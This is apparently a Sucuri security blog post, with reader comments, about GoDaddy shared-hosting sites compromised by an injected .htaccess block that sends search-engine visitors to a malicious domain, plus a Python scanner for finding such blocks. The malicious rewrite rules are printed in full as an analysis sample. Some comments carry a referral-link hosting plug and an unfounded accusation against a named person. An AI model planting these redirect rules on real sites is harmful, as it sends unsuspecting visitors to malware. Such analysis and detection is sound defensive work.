GoDaddy shared servers compromised – .htaccess redirection to sokoloperkovuskeci.com

We are seeing many sites hosted on GoDaddy shared servers getting compromised today (and for the last few days) with a conditional redirection to sokoloperkovuskeci.com. This is what it looks like on our scanner:

Suspicious conditional redirect.
Details: http://sucuri.net/malware/entry/MW:HTA:7
Redirects users to:http://sokoloperkovuskeci.com/in.php?g=1105

This is caused by this entry that is added to the .htaccess file of the compromised sites:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=916 [R,L]

What is going on?

These redirection attacks are very common on outdated WordPress and Joomla sites, but this time (and for this specific malicious domain), we are only seeing them on GoDaddy-hosted sites. So it looks like a compromise of their own servers (similar to what has happened in the past).

What happens to anyone visiting these hacked sites?

The malware checks whether anyone visiting the infected site is coming from a Google search (or Yahoo, or Bing) and, if they are, redirects them to that domain (sokoloperkovuskeci.com). From there, the user gets redirected again to other locations to get their browser infected too. Because the rules only fire for visitors arriving from a search engine, a site owner who types the URL directly will not see the redirect. So you have to fix your site ASAP to protect your own users.
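To check your own account for this pattern, the following is an added example (not Sucuri's scanner code) that flags any .htaccess where HTTP_REFERER conditions naming search engines feed a RewriteRule pointing at an external host. It generalizes beyond this one domain; the function names, the own_hosts parameter and the sample input are assumptions made for the illustration.

```python
import os
import re
from urllib.parse import urlparse

# Engine names as they appear in the injected block quoted in this post.
ENGINES = ("google", "yahoo", "bing", "msn", "live", "aol", "ask", "altavista", "excite")
COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)", re.I)

def find_referer_redirects(text, own_hosts=()):
    """Return (line_no, target, engines) for each RewriteRule that sends
    search-engine referrals to an absolute URL on a host not in own_hosts."""
    findings, engines = [], set()
    for no, line in enumerate(text.splitlines(), 1):
        cond = COND.match(line)
        if cond:
            engines.update(e for e in ENGINES if e in cond.group(1).lower())
            continue
        rule = RULE.match(line)
        if rule:
            host = (urlparse(rule.group(1)).hostname or "").lower()
            if engines and host and host not in own_hosts:
                findings.append((no, rule.group(1), sorted(engines)))
            engines = set()  # conditions bind only to the next RewriteRule
    return findings

def scan_tree(root, own_hosts=()):
    """Run the check on every .htaccess under root; returns {path: findings}."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, errors="replace") as fh:
                found = find_referer_redirects(fh.read(), own_hosts)
            if found:
                hits[path] = found
    return hits

# Constructed sample: a benign WordPress-style rule followed by the injection.
SAMPLE = """\
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=916 [R,L]
"""

if __name__ == "__main__":
    print(find_referer_redirects(SAMPLE))
```

Pass your own domains in own_hosts so legitimate referrer-based redirects to your own site are not reported; any remaining hit is a lead for manual review of that file.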

Need help?

You can scan your site here: sitecheck.sucuri.net to see if it is compromised. If you need someone to clean it up for you, sign up here: Sucuri Signup

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • Madcarrots

    Why do you have the share/tweet links if you keep resetting them when someone posts this article to Facebook?

  • Canhazcode

    I see this happen quite often; it just doesn’t make news. All it takes is one lfi/rfi on a site and the server is owned. Oftentimes discovered lfi/rfi are on GoDaddy servers, it seems. They’re an easy target.

  • Admin

    You’ll need to request malware review at Google if this happened to you. Read this link:
    http://www.google.com/support/webmasters/bin/answer.py?answer=168328

  • http://twitter.com/youwave YouWave for Android

    I am one of the victims. I cleaned up my site and now it is under Google Webmaster Tool review. I called GoDaddy customer support. They basically have no idea what was going on except to say that I have to fix MY site’s vulnerability. From what I see from your post, the vulnerability is likely from GoDaddy itself. Do you have any insight on the method of this attack?

    I am considering moving out of GoDaddy. Are other hosting providers safer?

    • mediazone

      We tested many hosts, but had problems with all of them. The only one that never gave us problems is the one we currently use and will always use: stablehost.com
      You can use our referral if you want to help us. This way, we will get 10% of your payment (you will not pay more for the service). Link: http://bit.ly/n2tzKU
      For more details about stability, ask us!

    • Allan

      One of my clients was using Go Daddy to host their web site, which became irreparably damaged (in July 2010) when attacked by a rootkit. Go Daddy admitted that the infection occurred in 2008, even before the web site was installed in a virtual dedicated server (in 2009). So it had been sitting on the server for over a year, undetected. Apparently Go Daddy doesn’t bother running security software to check for rootkits. I would never use them for hosting.

      For all my sites and my clients’ sites, I use Sightground.com, and so far they have had 100% uptime, with unlimited disk space and bandwidth. I’ve never had any security problems with accounts on their servers.

    • Dusty

      Host with HostGator.com :)

  • Guest

    This isn’t news, these types of incidents are routine for GoDaddy shared hosting.

  • http://stewartmedia.biz/myblog/ jimboot

    Thanks for this post – we had one of our clients hit by it. No announcement from GoDaddy I see. 

  • invalidka

    In the middle of June, while trying to fix the MX records of my website, I found a simple URL exploit which gave me access to every single email account stored on GoDaddy’s email servers (ironically named “secure-server.net”). After confirming that I wasn’t just crazy and was indeed able to hit other user’s accounts, I called GoDaddy right away. I was passed around on the phone, and they made it seem like they didn’t care. I was never followed up with, or thanked. They fixed the issue 2 days later.

    It sucks that such a big company can’t get their simple security shit together. Theoretically, I could have created a script that would have downloaded the inboxes of millions of their customers, which I’m sure would result in a significant monetary and reputation loss for the company. I’m sure that there are many more issues that we haven’t heard about, and I hope people really put some pressure on these guys to get their act together. I know I didn’t.

  • http://www.jpanganiban.com Jesse Panganiban

    If you’re a victim, get out of GoDaddy then get yourself a decent VPS: Linode or Slicehost. Manage your server from ground-up and know what’s going on. Be in control.

  • http://www.chriswiegman.com/ Chris Wiegman

    Another reason why GoDaddy should stop trying to offer hosting and concentrate on what they’re good at.

    • http://wkevingilbert.me/ Kevin Gilbert

      Which is what? They’re not good at anything.

  • M Syeda

    They never learn themselves…we should teach them by leaving their hosting.

  • Guest

    I am suspecting that GoDaddy may be co-owned by the Russian guy Andreev (not his real family name) who owns Monopost servers and Badoo. He’s also a creator of SpyLog and seemingly a seasoned hacker. Badoo has many profiles that were created by shady means, meaning by using emails and names of people whose sites, emails, or directory listings have been hacked. What is most worrisome is that the guy is a perfect scammer with his “business” and “residence” at odd places such as Cyprus, Russia, UK, and others. FBI should shut him down.

  • beatstockpromotersdotcom

    I recently had an .htaccess redirect on my web site here about the top penny stocks, and then after I fixed it the same hacker put in an iframe code injection and rehacked it, getting me banned from Google. I would like to know the cheapest way to prevent this in the future. Some people said switch from GoDaddy and then others said the host doesn’t really matter. Who to listen to???